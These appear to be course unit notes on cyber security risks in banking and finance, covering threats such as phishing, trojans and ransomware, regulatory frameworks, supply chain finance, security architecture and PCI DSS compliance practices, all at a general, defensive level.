Unit code: 603/3331/5
Cyber Security Threats and Risks: Banking and Finance
Unit Reference : CSEC06
1.1: Analyze how threats and risks to traditional banking and finance platforms and emerging financial impact internal business resilience.
Definition:
• Cyber Security is “the security of information and its communicating channels as applied to computing devices such as computers and smartphones, as well as computer networks such as private and public networks, including the Internet as a whole.”
• The field covers all the processes and mechanisms by which computer-based equipment, information and services are protected from unintended or unauthorized access, change or destruction.
• Computer security also includes protection from unplanned events and natural disasters.
• Cyber security is a complex issue that cuts across multiple domains and calls for multidimensional, multilayered initiatives and responses.
• The arrangement of technologies, protocols, and methods referred to as "cyber security" is meant to guard against attacks, damage, malware, viruses, hacking, data theft, and unauthorized access to networks, devices, programs, and data.
• Protecting the user's assets is the primary goal of cyber security in banking. As more people become cashless, additional acts or transactions go online. People conduct transactions using digital payment methods like debit and credit cards, which must be protected by cyber security.
• The bankingindustry has prioritizedcyber security highly.
• Buildingcredibility and trust is the cornerstone of banking, so it becomes much more essential.
Here are five factors that demonstrate the significance of cyber security in the bankingindustry :
• Everyone looks to be entirely cashless and usingdigital payment methods like debit and credit cards. In this case, ensuring that the required cyber security safeguards are in place to protect your privacy and data is critical.
• After data breaches, it could be difficult to trust financial institutions. That's a significant issue for banks. Data breach es caused by a shoddy cyber security solution may easily lead to their consumer base moving their business elsewhere.
• The majority of the time, when a bank's data is compromised, you lose time and money. Recovery from the same can be unpleasant and time-consuming. It would entail cancelingcards, reviewingstatements, and keepinga watchful lookout for issues.
• Inappropriate use of your private information might be very harmful. Your data is sensitive and could expose a lot of information that could be exploitedagainstyou, even if the cards are revoked and fraud is swiftly dealt with.
• Banks need to be more cautious than most other firms. That is the price for banks to retain the kind of valuable personal data they do. If the bank's informationis not safeguarded against risks from cybercrime, it could be compromised
• Cybercrimes have increased frequently over the past several years to the point where it is thought that they are one of the most significant hazards to the financial sector.
• Hackers have improved their technology and expertise, making it difficult for any banking sector to thwart the attack consistently.
The following are some dangers to bank’s cyber security:
• One of the most frequent problems with cyber security in the banking sector is phishing assaults. They can be used to enter a financial institution's network and conduct a more severe attack like APT, which can have a disastrous effect on those organizations (Advanced Persistent Threat). In an APT, a user who is not permitted can access the system and use it while going unnoticed for a long time. Significant financial, data and reputational losses may result from this.
• The term "Trojan" is used to designate several dangerous tactics hackers use to cheat their way into secure data. Until it is installed on a computer, a Banker Trojan looks like trustworthy software. However, it is a malicious computer application created to access private data processed or kept by online banking systems. This kind of computer program has a backdoor that enables access to a computer from the outside.
• Around the globe, there were roughly 54,000 installationpackages for mobile banking trojans in the first quarter of 2022. There has been an increase of more than 53% compared to last year's quarter. After decliningfor the first three quarters of 2021, the number of trojan packages targetingmobile bankingincreased in the fourth quarter.
• A cyber threat known as ransomware encrypts important dataand prevents owners from accessing it until they pay a high cost or ransom. Since 90% of bankinginstitutions have faced ransomware in the past year, it poses a severe threat to them.
• In additionto posinga threat to financial cyber security, ransomware also affects crypto currency. Due to their decentralizedstructure, crypto currencies allow fraudsters to break into tradingsystems and steal money.
Hackers use a clone site in this type of cyber attack. By posing as a financial website, they:
▪ Design a layout that resembles the original one in both appearance and functionality.
▪ Establish a domain with a modest modification in spelling or domain extension.
• The user can access this duplicate website via a third-party messaging service, such as text or email.
• Hackers can access a user's login information when the person is not paying attention.
Seamless multi-factor authentication can solve a lot of these issues.
• Through increased online and mobile options that offer immediate and easy access, Gen-Z is shaping the future of banking. This poses a challenge to traditional bankingwhere you need to be quick to market, providingsolutionsacross your organizationto address business problems efficiently.
• Embrace innovation in your institution by leveragingtechnology to maximize existingprocesses and procedures. Invest in digital engagement tools to ensure long-lastingrelationships with customers. Remember that consumers will gravitate towards institutionsthat are the easiest to work with and have deployed user-friendly and adaptable technologies.
• The rise of Fintechs pose another challenge to traditional banking. These revolutionary start-upshave gained significanttractionby evaluatingcustomer demands and respondingwith tailored products and resources. Consumers prefer to do business when their life is made easier with user-friendly technologies.
• Look at Fintechs as potential partners rather than competitors. Embracingthis technology will improve your customer retention and attract new customers as well. Collaborating(rather than competing) will provide you the opportunity to capitalize on cuttingedge technology that will meet the tech-savvy user demands. Through a partnership, your institutioncan significantly reduce structural costs and provide employees more time for buildingrelationships.
• Access to increased bankingtechnology means there is more opportunity for breaches and scams. However, institutions cannoteliminate all possible sources of cyber threats.
• Employ effective security tools, or the right partner, to limit the vulnerability of entry points from potentialattacks. Leverage solutions that address advanced analytics, real-time monitoring, AI, and identity verification.
• More and more applications are beingwritten with cloud-based technology. Implementingcloud technology providesfor the elimination of on-premise hardware / software, allowingyou to focus on banking. It also gives financial institutions a seamless path to disaster recovery. Self-service technology such as chatbots can assist banks with customer service in this new environment.
• Embrace technologies such as Alexa or Google Assistant thatare startingto act as virtual bankingconcierges. This means your customers will use smart devices to access their financial informationwhere you were once the main source. Embracingcloud technologies will free up resources, allowing you to focus on your main business: banking.
• This has become the most prominent industry challenge due to the steep increase in regulatory requirements. It is no secret that compliance can significantlystrain resources, often involvingtimeconsuming processes that require you to compile and analyze data from divergentsources.
• Create a culture of handlingcompliance through technology that collects and mines data, performs indepth data analysis,and provides insightful reporting. This is crucial for identifyingand minimizing compliancerisk. Take an inventoryof your product mix to determine that you have the right solutions in place.
• Cyber security threats are constantly evolving, and the bankingsector must take action to protect itself. Hackers adapt when new defenses threaten more recent attacks by developingtools and strategies to compromise security.
• The financial cyber security system is only as strongas its weakest link. It is critical to have a selection of cyber security tools and approaches available to protect your data and systems.
Cyber security tools include:
• Network monitoringis known as continuously scanninga network for signs of dangerous or intrusive behavior. It is frequently utilized with other security solutions like firewalls, antivirussoftware, and IDS (Intrusion Detection System). The software allows for either manual or automaticnetwork security monitoring.
• Application security safeguards applicationsthat are essential to businessoperations. It has features like an application a llowing listingand code signing and could help you synchronize your security policies with file-sharingpermissions and multi-factor authentication. The use of AI in cyber security will inevitably improve software security.
• Financial cyber security includes risk management, data integrity, security awareness training, and risk analysis.
• Essential elements of risk management include risk evaluationand the prevention of harm from those risks.
• Data security also addresses the security of sensitive information.
• Wide-area network connections help avoid attacks on massive systems. It upholds the rigid safety standards set by the industry for users to follow when taking cyber security steps to protect their devices.
• It continuously monitors all programs and performs security checks on users, servers, and the network.
• Security ratings are a great approach to indicate that you're concerned about the organization's cyber security.
• Also demonstrate that you are following industry and regulatory best practices for IT security and making long-term decisions based on that knowledge.
• A cyber security framework may be beneficial.
• Opt for Ethical Hacking training to enhance your knowledge further.
• A cyber security framework provides a common language and set of standards for security leaders across countries and industries to understand their security postures and those of their vendors.
• With a framework, it becomes easier to define the processes and procedures your organization must take to assess, monitor, and mitigatecyber security risk.
• For increased cooperation between the public and private sectors for recognizing, analyzing, and managing cyber riskthe NIST Cyber security Framework was created.
• NIST has emerged as the gold standard for evaluating cyber security maturity, detecting security weaknesses, and adhering to cyber security legislation even when compliance is optional.
• CBEST vulnerability testing methodology was developed by the UK Financial Authorities in collaboration with CREST (the Council for Registered Ethical Security Testers) and Digital Shadows.
• It is an intelligence-led testing framework. CBEST's official debut took place on June 10, 2013.
• CBEST leverages intelligence from reputable commercial and government sources to find possible attackers for a specific financial institution. Then, it imitates these potential attacker‘s methods to see how successfully they can breach the institution's Defenses. This enables a company to identify the weak points in its system and create and implement corrective action plans.
3. Cyber security and Privacy Framework for Privately Held InformationSystems (the CIPHER Framework)
• Computer systems that organizations, both publicand private, control and that hold personal datagathered from their clients are referred to as PHISs (Privately Held InformationSystems).
• CIPHER framework addresses electronicsystems, digital informationkinds, and methods for data sharing, processing, and upkeep (not paper documents).
• The CIPHER methodological framework's primary goal is to suggest procedures and best practices for protectingprivately held informationsystems online (PHIS).
The followingare the main features of CIPHER methodological framework:
• Technology independence (versatility) refers to the ability to be used by any organization functioningin any field, even as existingtechnologies deteriorate or are replaced by newer ones.
• PHIS owners, developers, and citizens are the three primary users who focus on this user-centric approach.
• Practicality - outlines possible precautions and controls to improve or verify whether the organizationis safeguardingdata from online dangers.
• It is simple to use and doesn't require specializedknowledge from businesses or individuals.
• The general public's understandingof cyber security has been relativelylow, and few businesses have significantlyinvested in raising that awareness.
• Due to the low priority given to cyber security, it frequently receives short budgetary shrift. Cyber security continuesto receive little attention from top management, and programs that assist it are accorded low priority. They might have underestimated how serious these risks are, which is why.
• The core component of cyber security has alwaysbeen identity and access management, especially now when hackers are in control and might access a business network with just one compromised login. Although there has been a little progress in this area, much work still needs to be done.
• Recent computer attacks have brought our attention to the growing threat of ransomware. Cybercriminals are beginning to employ various techniques to avoid being identified by endpointprotection code that concentrates on executable files.
• The majority of banking organizationsnow conduct business primarilythrough mobile devices. Every day the base grows, making it the best option for exploiters. Due to increased mobile phone transactions,mobile phones have become a desirable target for hackers.
• Hackers have increased their exploitation as a result of social media adoption.Customers that are less knowledgeableexpose their data to the public,which the attackers abuse.
• The financial sector faces significant exposure to cyber risk given that it is information technology-intensive and highly interconnected through payment systems.
• Therefore, it is important for financial firms to strengthen their cyber resilience, which is defined by the Financial Stability Board (FSB) as "the ability of an organization to continue to carry out its mission by anticipating and adapting to cyber threats and other relevant changes in the environment and by withstanding, containing and rapidly recovering from cyber incidents.
• Within the financial sector, banks typically have the most public-facing products and services.
• Bank systems have multiple points of contact with outside parties, which can mean significant vulnerability to cyber attacks, with those interfaces being used as entry points for attacks targeting other parts of the financial system.
• Bank supervisory authorities have established regulatory and supervisory frameworks to enhance bank’s cyber resilience.
• Regulators expect banks to address cyber risk either in their risk management and or informationsecurity frameworks or in their specific cyber security strategies. The latter includes requirements relatedto governance and oversight;risk ownership and accountability;informationsecurity;periodic evaluation and monitoringof cyber security controls;incident response; business continuity;and recovery planning.
• Supervisors assess bank’s cyber security controls and their monitoringand surveillance of emerging threats. These assessments are based on bank‘s adherence to existing industry standards.
• Supervisory assessments also include challenges to bank approaches to testingcontrols and the remediation of issues identified.
• Challenges can include the review of control testingreports, which may be part of a more formal testingprogram. Such a program could employ various testingmethodologies and practices, such as vulnerability assessment, penetration testingand red team testing.
• Regulators expect banks to establish a framework for incident response and recovery that may include cyberspecific business continuity and disaster recovery requirements. The seven components:
• Governance
• Planning and preparation
• Analysis
• Mitigation
• Restoration and recovery
• Coordination and communication
• Improvement
• Regulators expect banks to account for business continuity and informationconfidentiality and integrity when dealingwith th ird parties. Business continuity plansof critical third-party providers shouldalign with the needs and policies of the bank.
• Confidentiality and integrity of information, on the other hand, are addressed in general data protection requirementsand specific security requirements for safeguardingbank and customer information.
• Regulatory requirements for use of the cloud by banks may also apply. These include specific requirements on data location, data segregation, data use limitations, datasecurity and treatment of data in the event of termination of a third-party arrangement.
• Supervision of third-party dependencies relies on the ability of the authority to supervise these firms directly.
• When supervisors do not have oversight of third parties, one possible approach is to place the onus on banks to ensure that the third parties have the same security policies, procedures and controls that are expected of regulated firms.
• Another approach is to require service level agreements between banks and third parties to include a clause that allows supervisors to examine the latter's systems. In contrast, when supervisors have oversight of third parties, they may opt to assess for themselves the soundness of their cyber security, particularly for those that provide the most critical services.
There are five types of cyber security informationsharing arrangement:
• Sharing among banks
• Sharing by banks with regulators
• Sharing among regulators
• Sharing by regulators with banks
• Sharing with security agencies
The kind of information shared varies by type of information-sharingarrangement. For example, information related to cyber incidents is more widely observed in sharing by banks with regulators and with security agencies, whereas cyber threat-related information is the most common kind of information shared among banks.
• Supervisors are still developing metrics for measuring the quality of bank‘s cyber resilience.
• Early metrics have focused on using information from reported incidents, surveys, testing activities and on-site inspections. There is recognition of the need to develop more forward-looking cyber resilience metrics.
• https://www.scribd.com/document/435 012054/Cyber-Security
• https://www.scribd.com/read/2941099
17/Finance-Cloud-Computing-CyberSecurity-and-Cyber-Heist-BeginnersGuide-to-Help-Protect-Against-OnlineTheft-in-the-Cyber-World
• https://www.scribd.com/read/4319610
80/7-Rules-to-Influence-Behaviour-andWin-at-Cyber-Security-Awareness
2.1: Explain how the financial supply chains for fast-growth medium to large organizations work in financial services.
2.2: Discuss how architectural structure relates to cyber security planning considerations.
• Financial markets comprise five key components:the debt market, the equity market, the foreign-exchange market, the mortgage market, and the derivative market.
• The Global FinancialArchitecture (GFA) is the “collective governance arrangements at the internationallevel for safeguardingthe effective functioningof the global monetary and financial systems”(Elson 2010: 17).
• A financial system consists of individuals like borrowers and lenders and institutions like banks, stock exchanges, and insurance companies actively involved in the funds and assets transfer. It gives investors the ability to grow their wealth and assets, thus contributingto economicdevelopment.
• Most often bankingsystems use Service-oriented architecture (SOA) which refers to the frameworks and processes that enable bankingapplicationfunctionalities to be provided as sets of services relevant to specificbusiness functions.
• The post-Asian crisis GFA is characterized by a more structured system than ever before.
Arner and Buckley (2010: 201-202) argue that the contemporary GFA has four structural characteristics:
• First, a global consensus on what sound financial and regulatory systems should look like.
• Second, the creation of sound principles and practices by technocratic institutions such as Basel Committee on Banking Supervision.
• Third, the use of markets to incentivize the use of sound principles.
• Finally, the promotion of sound principles by multilateral institutions such as the IMF, an example being conditional loans which encourage structural adjustment.
• Supply chain finance (or 'supplier finance') is a type of cash advance. Similar to invoicefinance, it's based on the credit rating of companies in the supply chain.
• It's a way for smaller businesses to benefit from the higher credit scores of their buyers and for buyers to lengthen their payment terms.
• Large multinational companiesare highly likely to honor invoicesfrom suppliers. That means the suppliers that work with them can get 100% of the value advanced from a lender, minus a small fee, once the buyer has approved the invoicefor payment — because, at this stage, the risk of non-paymentis low.
• Supply chain finance involvesa shared arrangement between Exporters and Importers engaged in international trade. Financial institutionsoffer it to enableboth parties to manage their invoicepayment terms, maintain liquidity and keep money flowing freely through their supply chains.
• The complete business process includes the procure-to-paycycle, working capital management, and the order-to-cash cycle. The overarching purpose of FSCM (Financial SupplyChain Management) is to achieve and maintain visibilityinto all of these activities so that your supply chain may be as efficient as possible while capitalizingon cost savings.
• The supplier issues an invoice to the buyer.
• The buyer confirms that the invoice has been approved for payment to the lender.
• The supplier gets the value straight away (minus a small fee).
• When payment is due, the buyer pays the lender.
• In this way, the supplier's cash flow is stabilizedbecause they get paid within a few days, rather than waitingfor the expected 'payment due date (which could be as long as 120 days).
• Meanwhile, the buyer simultaneously benefits because they have effectively extended their payment terms without negatively impactingtheir suppliers. After all, if the lender takes the payment delay, the supplier gets paid within a few days, and the buyer's working capital is untouched until their extended paymentterms are over.
• Increases Profit Leverage – Firms value supply chain managers because they help control and reduce supply chain costs. This can result in dramatic increases in firm profits.
• Stability - With the early payment of invoices, Suppliers are more likely to withstand financial pressures that could limit their ability to deliver quality goods or services on time.
• Reduced costs - Suppliers have flexible control over their working capital, controlling when and how many of their invoices need to be funded. The Buyer can also benefit from extended payment terms to help manage cash flow.
• Inexpensive credit – Small and medium-sized enterprises (SMEs) are more likely to be refused a loan from a bank or financial institution. Supply chain finance is not classified as a standard loan, so it can be an efficient way for business owners to obtain short-term credit without much risk.
• Speed - Supply chain finance is often quicker to arrange than a loan because it depends on fewer criteria.
• Risk - Businesses must put up collateral when arranging a bank loan but this isn’t necessarily so with supply chain finance. Therefore, companies are at a higher risk of insolvency by stretching themselves financially.
• Reduction in profit - Supply chain finance fees can reduce a company’s profit margins, so they must be considered before the arrangement is made.
• A cyber security architecture is the foundation of an organization's defense against cyber threats, and ensures that all components of its IT infrastructure are protected.
• Environments that are secured by a cyber security architecture include: Cloud Networks.
• As part of a system's architecture, a cyber security framework is one of its components.
• A complete product or system is created and constructed around it. Security architecture is a framework for determining how your company's security controls and countermeasures fit into the broader system structure.
• Keeping your critical systems' quality attributes like confidentiality, integrity, and availability is the primary goal of these controls. In addition, it's the synergy of hardware and software understanding, together with programming expertise, research abilities, and policy formation.
• The strength of an organization'sstructure is critical to its success. It would help if you had a thorough company strategy, well-trained workers, and essential executives with relevantbusiness expertise to succeed. To build a good cyber security team, you must have the qualitiesabove consistency, dedication,and focus on the task.
• To secure your firm from external attacks, you must ensure that your organization'scyber security architecture is airtight. Cyber-attacks and cyber security architecture breaches happen in a variety of shapes and sizes. As a result, it's critical that a company like yours maintainsa high level of security awareness and is well-versed in defensive methods and tactics.
• Numerous dangers might befall your company if you don't have reasonablesecurity measures.
• Someone good at anticipatingand preventingcyber-threatsis known as a security architect. A cyber security architecture plan can help you implement and monitor your company's network security systems, which are vulnerable to cyber attacks. Usinga Microsoft cyber security reference architecture framework, you can see how your security measures relate to the more extensive system architecture about hostile actors.
• Antivirus, firewalls, and intrusiondetectionsystems are essential in defendingyour business from external threats. Your organization should develop a complete security architecture incorporatingthese many parts for your networks to maintainand optimize these security technologies and currently existingand workingrules and processes.
• Protectingan organization's resources and other critical information is the goal of this approach. Data flow is crucial to the overall success of a cyber security framework. Everyone in your firm must adhere to the security architecture's foundationand practices.
• Modern technology necessitates an organization's use of a cyber security reference architecture framework to safeguard critical data. This dramatically minimizes the risk of an attacker successfully gainingaccess to an organization's network infrastructure. With security architecture, a firm may create a risk-free environmentwhile adheringto the most current security standards and business requirements.
• This is only one of the numerous advantages of this approach. Organizations may show their integrity and secrecy to prospective partners with the aid of security architecture. Confidentiality, Integrity, and Accessibility are the foundationsof a solid security architecture. This will make it much easier for customers and partners to conduct business with and trust a company.
• The cost of preventingcyber attacks is high. This may have a wide range of effects, from product recalls and humiliatingnews conferences to reputationalharm and severe financial losses due to security breaches. When a mistake is not discovered early in the codingprocess, the cost of repairingit might rise by as much as 300 per cent.
• Post-release or production-stagedetection of the same problem might result in a cost increase of up to 3,000 per cent. Security should be included at every manufacturingstage to help prevent or lessen the likelihood of mistakes being introduced throughoutthe product developmentprocess. All products should be created with security in mind to reduce the risk of zero-day attacksand hurried (and consequentlycostly) updates.
• It is widely accepted that the more an organization strivesto minimize risks and decrease vulnerabilities,the more likely it is to have a positive result if it is the victim of a cyber-attack. Punitive actions, which may further harm a company's image and finances, can be avoided by adhering to rules.
• Businesses are attemptingto ensure that their technologycomplies with GDPR laws, which have become more stringent since their inception.On the other hand, the legislativeenvironmentis working hard to keep up with the rapid advancementof technology. In other words, the rules and procedures of both sides of the equation are continuallybeing revised and tightened.
Elements of the network
• A network node is a device that connects to other devices on the network, such as computers and gateways. Networks use several different protocols to communicate, such as TCP/IP, HTTP, HTTPS, IMAP, and FTP. Protocols are used to connect nodes on a network. Point-to-point, chain, circular, and hybrid node topologies are all examples of network topology.
• There are many types of cyber security equipment, including intrusion detection systems, firewalls, encryption and decryption devices, and more. Antivirus, spyware, and antimalware software are all included in this package. Network protocols such as IMAP and TCP/IP are protected by encryption and other techniques like HTTPS and FTTP.
• End-to-end encryption, blockchain, and zero-privacy knowledge are some of the best methods for securing data.
• IEC 27000 series and NIST Risk Management Framework SP 800-37 are two examples of architectural cyber security framework standards.
• Cyber security architecture example are subject to a set of technical guidelines.
• In your firm, they are the security rules and procedures addressed and implemented. This forum believes an ideal cyber security architecture should be specified and simulatable is an industry-standard architecture modeling language (e.g., SysML, UML2). Even though we've just scratched the surface of cyber security architecture, you must grasp the fundamental steps involved.Listed below are the actions of the security architecture framework and process:
Assessment of Architectural Risks
• A vital business asset, hazard, and the effects of security threats and vulnerabilitiesare examined. Security services design and architecture are crafted to help you meet your business risk exposure objectives and goals when it comes to protecting your company's assets.
Implementation
• The enterprise cyber security architectureis designed to guarantee that security rules and policies, security architecture choices, and risk assessments are implemented and effective.
• It is used to monitor, supervise and control the operational condition,as well as to assess the influence of the system's security via threat and vulnerabilitymanagement.
• A company's primary network architecture, including sensitive data and critical applications, is wholly secured by cyber security architecture against any current or future threats and breaches.
• It is vital that you completely comprehend the numerous weaknesses in your system to swiftly and effectively provide a remedy.
• A cyber security architect is a perfect person to hire if you want to figure out where your system is vulnerable.
• Your sensitive data and critical applications will be adequately protected thanks to a cyber security architect's comprehensive examination of network topologies and cyber-attacks.
Security architecture's primary objectives are:
• There must be a way to prevent any cyber-attacks from occurring.
• To avoid being detected and penetrated by cyber threats, attack surfaces should be kept tiny and hidden to make them difficult to detect.
• Ensure that all of your personal and sensitive data is securely encrypted and sent using end-to-end encryption protocols.
• Countermeasures like Moving-Target Defenses identify, mitigate, and counteract all cyber attacks.
https://www.scribd.com/read/498886046/CybersecurityThe-Beginner-s-Guide-A-comprehensive-guide-to-gettingstarted-in-cybersecurity
https://www.scribd.com/document/607018650/PracticalCybersecurity-Architecture
3.1: Assess vulnerabilities and good industry practices related to the payment card Industry.
3.2: Apply the PCI DSS standard to your local domain/organization.
• Is a global forum that brings together payments industry stakeholders to develop and drive adoption of data security standards and resources for safe payments worldwide.
• The Payment Card Industry Data Security Standard (PCI DSS) is a set of requirements intended to ensure that all companies that process, store, or transmit credit card information maintain a secure environment.
• A business or organization's PCI scope includes all people, processes, and technologies that "touch," interact with, or affect the security of cardholder data. With a proper understanding of PCI scope, you can ensure that your software products help you and your clients improve payment security.
• PCI DSS is a widely accepted set of policies and procedures intended to optimize the security of credit, debit and cash card transactions and protect cardholders against misuse of their personal information.
• PCI Scope is nothing but part of your environment that must meet the 12 requirements stated within the PCI Data Security Standard (DSS). The scope is a combination of people, processes, and technologies that interact with or could otherwise impact the security of cardholder data (CHD).
• In an effort to enhance payment card data security, the PCI Security Standards Council (SSC) provides comprehensive standards and supportingmaterials, which include specification frameworks, tools, measurements, and support resources to help organizations ensure the security of cardholder informationat all times.
• The PCI DSS is the cornerstone of the council, as it provides the necessary framework for developinga complete payment card data security process that encompasses prevention, detection, and appropriate reaction to security incidents.
Tools and Resources Available from PCI SSC:
• Self-Assessment Questionnaires to assist organizations in validatingtheir PCI DSS compliance.
• PIN Transaction Security (PTS) requirements for device vendors and manufacturers and a list of approved PIN transactiondevices.
• Payment ApplicationData Security Standard (PA-DSS) and a list of Validated Payment Applications to help software vendors and others develop secure payment applications.
Public resources:
• Lists of Qualified Security Assessors (QSAs)
• Payment ApplicationQualified Security Assessors (PA-QSAs)
• Approved ScanningVendors (ASVs)
• Internal Security Assessor (ISA) education program
• Firewalls essentially block access of foreign or unknown entities attemptingto access private data. These prevention systems are often the first line of defense against hackers (malicious or otherwise). Firewalls are required for PCI DSS compliance because of their effectiveness in preventingunauthorized access.
• Routers, modems, point of sale (POS) systems, and other third-party products often come with generic passwords and security measures easily accessed by the public. Too often, businesses fail to secure these vulnerabilities. Ensuringcompliance in this area includes keeping a list of all devices and software which require a password (or other security to access). In additionto a device/password inventory, basicprecautions and configurations should also be enacted (e.g., changing the password).
• The third requirementof PCI DSS compliance is a two-fold protection of cardholder data. Card data must be encrypted with certain algorithms. These encryptions are put into place with encryption keys — which are also required to be encrypted for compliance. Regular maintenance and scanningof primary account numbers (PAN) are needed to ensure no unencrypted data exists.
• Cardholder datais sent across multiple ordinary channels (i.e., payment processors, home office from local stores, etc.). This datamust be encrypted whenever it is sent to these known locations. Account numbers should also never be sent to locations that are unknown.
• Installing anti-virus software is a good practiceoutside of PCI DSS compliance. However, anti-virus software is required for all devices that interact with and/or store PAN. This software should be regularly patchedand updated. Your POS provider should also employ anti-virus measures where it cannot be directly installed.
• Firewalls and anti-virus software will require updates often. It is also a good idea to update every piece of software in a business. Most software productswill include security measures, such as patches to address recently discovered vulnerabilities, in their updates, which add another level of protection. These updates are especially required for all software on devices that interact with or store cardholder data.
• Cardholderdata is required to be strictly “need to know.” All staff, executives, and third parties who do not need access to this data should not have it. The roles that do need sensitive data should be welldocumented and regularly updated— as required by PCI DSS.
• Individualswho do have access to cardholderdata should have individual credentialsand identification for access. For instance, there should not be a single login to the encrypted data with multiple employees knowing the username and password. Unique IDs creates less vulnerabilityand a quicker response time in the event data is compromised.
9. Restrict Physical Access
• Any cardholder data must be physicallykept in a secure location.Both data that is physicallywritten or typed and data that is digitally-kept(e.g., on a hard drive) should be locked in a secure room, drawer, or cabinet. Not only should access be limited, but anytime the sensitive data is accessed, it should be kept in a log to remain compliant.
• All activity dealing with cardholder data and primary account numbers (PAN) require a log entry. Perhaps the most common non-compliance issue is a lack of proper record keeping and documentation when it comes to accessing sensitive data. Compliance requires documenting how data flows into your organization and the number of times access is needed. Software products to log access are also needed to ensure accuracy.
• All ten of the previous compliance standards involve several software products, physical locations, and likely a few employees. There are many things that can malfunction, go out of date, or suffer from human error. These threats can be limited by fulfilling the PCI DSS requirement for regular scans and vulnerability testing.
• Inventory of equipment, software, and employees that have access will need to be documented for compliance. The logs of accessing cardholder data will also require documentation. How information flows into your company, where it is stored, and how it is used after the point of sale will also all need to be documented
• PCI Compliance means that your systemsare secure, and your customers can trust you with their sensitive payment card information; trust leads to customer confidence and repeat customers.
• PCI Compliance improves your reputation with acquirers and payment brands – just the partners your business needs.
• PCI Compliance is an ongoing process that aids in preventing security breaches and payment card data theft in the present and in the future; PCI compliance means you are contributing to a global payment card data security solution.
• As you try to meet PCI Compliance, you’re better prepared to comply with additional regulations, such as HIPAA, SOX, and others.
• PCI Compliance contributes to corporate security strategies (even if only a starting point).
• PCI Compliance likely leads to improving IT infrastructure efficiency.
• Compromised data that negatively impacts consumers, merchants, and financial institutions.
• Severely damaging your reputation and your ability to conduct business effectively, not just today, but into the future.
• Account data breaches that can lead to catastrophic loss of sales, relationships, and community standing; plus, public companies often see depressed share price as result of account data breaches.
• Lawsuits, insurance claims, canceled accounts, payment card issuer fines, and government fines.
• PCI Compliance, as with other regulatory requirements, can pose challenges to organizations that are not prepared to deal with protecting critical information. But, protecting data is a much more manageable task with the right software and services. Choose a data loss prevention software that accurately classifies data and uses it appropriately so you can rest more easily knowing that your cardholder data is secure.
• The Payment Card Industry Data Security Standard (PCI-DSS) aims to enhance security for consumers by setting guidelines for any company that accepts, stores, processes, or transmits credit card information — regardless of the number of transactions or the size of those transactions. Because of that, there are thousands of organizations spanning practically every industry that must comply with these standards.
• Maintaining compliance is a top priority.
• There are two methods by which POS data is stolen:by compromisingthe POS system itself using stolen credentials or by physically installing“card skimmers,” usually on self-checkout terminals that are not monitored. These devices, which take only seconds to install, stealpaymentcard data and PIN informationdirectly off the card’s magneticstripe. While the introduction of new chip cards will eliminate the threat of card skimmers, 42% of retailers has yet to update their payment terminals to accept chip cards – and even some retailers who have EMV-enabled terminals cannot accept chip cards because the POS software cannot yet handle them. It is imperative that such terminals not be left completely unattended. Every store should have on-site personnel who are trained to spot card skimmers and assigned to monitor self-checkout terminals for their presence.
• Because cyber security is a constant “Spy vs. Spy” battle where experts find ways to patch vulnerabilities while hackers find new ways to access systems, POS software systems release frequent updatesto address the most recent security threats. For maximum protection, these updates must be downloaded and installed as soon as they are released, not on a monthly or quarterly schedule. The same concept applies to operatingsystem software; retailers and restaurants that are running Microsoft Windows should ensure that patchesare installedas soon as they are available.
3. Always Change Default Manufacturer’s Passwords
• Retailers and restaurants should always change the default password provided by the manufacturer as soon as a new piece of hardware is hooked up to their POS system.
• Default passwords are publicly available, and thus widely known to hackers; in fact, the first thing an attacker will attempt to do is access the device using the default password.
• Changing default passwords is required as part of an organization’s compliance with PCI-DSS standards. Likewise, software system passwords should also be changed upon installation, and then on a regular basis afterwards.
• Many retailers, restaurants, and hotels offer free Wi-Fi to their customers. The POS system should never be hooked up to this network, as a hacker can use it to access the system. Likewise, if an organization’s POS system is not separated from its corporate network, a hacker who compromises the organization’s main network will be able to access its POS system. There are two ways to achieve this: by actually segmenting the two networks or by using multifactor authentication for communication between the organization’s main network and its POS system. The correct solution for a particular organization depends on its size and resources, so it’s best for organizations to consult a managed security services provider (MSSP) to determine which solution would best fit their needs.
• Retailers and restaurants have extremely thin profit margins, and the individually franchised restaurants that are popular in the fast-food industry tend to operate on particularly tight budgets. As the industry automates for the first time, it may be tempting for these small operators to seek out the best “deal” on self-checkout systems – but a POS system purchased from a manufacturer who turns out to be fraudulent is no “deal” at all, and it could result in financial ruin for that location. POS systems should be purchased only from known, reputable dealers, and if a “deal” on a system seems too good to be true, it probably is.
6. Your number one priority is protecting your cardholder data (CHD). PCI has a very comprehensive set of rules to accomplish protection, but your company can keep the following best practices in mind when striving for PCI compliance.
• Segment your data – It is imperative to keep your CHD segmented from your standard company data. This entails creating a cardholder environment (CHE) that only deals with CHD. This not only protects your data but it also reduces the scope of your PCI audit.
• Encrypt your data – All CHD should be encrypted, or tokenized, from the moment you interact with your customer’s card number. This also includes ensuring this data is encrypted while at rest.
• Control access to your data – Role-based access controls (RBAC) will make your PCI compliance much easier. RBAC will ensure your HR department has no access to CHD and your system administrators have the access they need.
• Monitor your data – Set up alerts for security incidents involving CHD or anything that could compromise your CHE. Attackers usually do not compromise your data by coming through your front door, but rather do it in a methodical, hidden manner as to not alert you. Monitor even the assets that you feel are trivial but support your CHE.
7. The PCI-DSS considers any person, system, or piece of technology that touches cardholder data(CHD) as in scope.
• For example, if your organizationoperatesa contact center that regularly accepts customer payments over the phone, you can descope your IT network infrastructure, agents/customerservice representatives, call recording systems, and other telephony from compliance by using dual-tone multi-frequency (DTMF)masking technologies.
• These technologies allow customers to directly enter their payment carddata into their phone's keypad, replacing DTMF tones with flat ones so they are indecipherable.
• By sending the CHD directly to the payment processor, such solutions keep the dataout of the contact center environment completely.
• As a result, there are far fewer controls required for PCI-DSS compliance, while sensitive data is out of reach from fraudstersand hackers
1. You need assigned ownership over the compliance process. Generally,it should be a security expert with relevantexperience in coordinatingsecurity activities.
2. You need to start buildingyour architecture with PCI-DSS requirements in mind.
3. Conduct an in-depth risk assessment to define security needs.
4. Provide custom and automated control over monitoring systems.
5. Detect and respond quicklyto security control issues.
6. Develop performance metrics to measure success and failure.
7. Be ready to prepare a bunch of documentation for PCI-DSS certification from scratch and guarantee continuouscompliance.
8. The list of documentation about your company and services includes:
• Antivirus Policy
• Cardholder Data Policy
• Firewall and Router Policy
• Information Security Policy
• Password Policy
• Physical Security Policy
• System Configuration Policy
• System Monitoring and Logging Policy
• Testing Systems and Processes Procedure
• Information Security Incident Management Policy
• Inventory and Ownership of Assets Policy
• Application and System DevelopmentSoftware Policy
• ManagingService Providers Policy
• Access Control Policy
• InformationSecurity Awareness Program
• InformationSecurity Responsibilities Policy Statement
